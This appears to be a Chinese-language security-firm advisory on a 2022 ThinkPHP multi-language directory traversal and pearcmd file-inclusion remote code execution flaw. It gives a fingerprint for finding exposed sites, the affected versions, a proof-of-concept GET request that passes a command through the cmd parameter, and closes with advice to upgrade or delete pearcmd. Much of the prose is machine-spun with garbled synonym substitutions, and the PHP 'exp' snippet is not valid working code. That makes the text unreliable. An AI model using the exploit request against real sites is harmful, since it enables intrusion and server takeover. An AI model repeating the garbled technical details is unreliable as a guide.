2022 ThinkphpV6远程代码命令执行漏洞详情

2022-12-25 0 466

ThinkPHP能说是方便快捷、固定式的面向对象的两个微服务项目构架,PHP后端架构合作开发,建立于2006年,遵从Apache2的开放源码协定展开开放,目地是为的是加速WEB开发工具合作开发和强化民营企业开发工具合作开发而产业发展出来的。倘若Thinkphp标识符迈入了多词汇那个机能,hack就能透过POST、GET、COOKIES等形式将蓄意模块填入进来发送至伺服器中展开继续执行蓄意标识符,并产品目录横越+文档包涵,借助pearcmd文档所含那个trick就能同时实现RCE远距标识符继续执行安全漏洞。

2022 ThinkphpV6远程代码命令执行漏洞详情

采用thinkphp并迈入多词汇的中文网站安全漏洞人脸如下表所示:

header=”think_lang”

安全漏洞负面影响版覆盖范围

v6.0.0<=ThinkPHP<=v6.0.13

v5.0.0<=ThinkPHP<=5.0.12

v5.1.0<=ThinkPHP<=5.1.8

安全漏洞借助详细情况

#exp

pearcmd文档所含方法

$cmd=$_GET[cmd];

$p=pearcmd;

$p->run($cmd);

产品目录横越

http://192.168.0.188:9999/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

能透过POST、cookies、GET等传参的形式,展开产品目录横越和文档包涵安全漏洞的借助,对thinkphp下的pearcmd文档展开远距代码指示继续执行,

HACK能借助构造蓄意的的URL,能同时实现产品目录横越和文档包涵,然后借助pearcmd文档所含对其伺服器展开远距指示继续执行。

那个安全漏洞借助的前提,必须要thinkphp迈入多词汇这一机能,像一些外贸公司中文网站,一些民营企业中文网站,想采用多词汇的中文网站都是能借助该安全漏洞展开远距标识符继续执行安全漏洞的。

具体的GET安全漏洞借助数据包如下表所示:

GET/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

Host:192.168.0.188:9999

User-Agent:Mozilla/5.0(WindowsNT10.0;Win32;x32;rv:79.0)Gecko/20100302Firefox/79.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.6,en-US;q=0.4,en;q=0.1

Accept-Encoding:gzip,deflate

Connection:close

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0

如何对该thinkphp安全漏洞展开修复?

我们SINE安全建议广大站长以及中文网站运营者,尽快的升级thinkphp到最高版,目前Thinkphp官方在最新版中修复了那个安全漏洞,也能对该pearcmd文档展开强制删除,待标识符安全漏洞修复后,还原该pearcmd文档,也能找专业的中文网站安全公司展开标识符安全漏洞修复和整体的中文网站安全加固。

举报/反馈

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务